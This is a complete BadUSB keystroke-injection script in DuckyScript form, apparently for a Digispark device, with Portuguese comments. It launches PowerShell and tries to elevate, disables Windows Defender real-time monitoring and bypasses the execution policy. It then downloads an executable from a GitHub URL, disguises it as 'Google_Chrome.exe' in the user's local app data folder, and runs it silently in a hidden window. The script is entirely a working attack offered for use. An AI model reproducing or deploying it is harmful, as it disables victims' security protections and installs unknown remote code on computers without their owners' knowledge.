REM Deixa o HID enumerar
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
CTRL-SHIFT ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING Set-ExecutionPolicy Bypass -Scope Process -Force
ENTER
DELAY 2000
REM Realiza o Download e a execução do arquivo
STRING (New-Object System.Net.WebClient).DownloadFile("https://github.com/Bxy777/digispark/raw/main/Google%20chrome%20(2).exe", "$($env:LOCALAPPDATA)\Google_Chrome.exe"); Start-Process -FilePath "$($env:LOCALAPPDATA)\Google_Chrome.exe" -ArgumentList "/S" -WindowStyle Hidden
ENTER
DELAY 7000
STRING exit
ENTER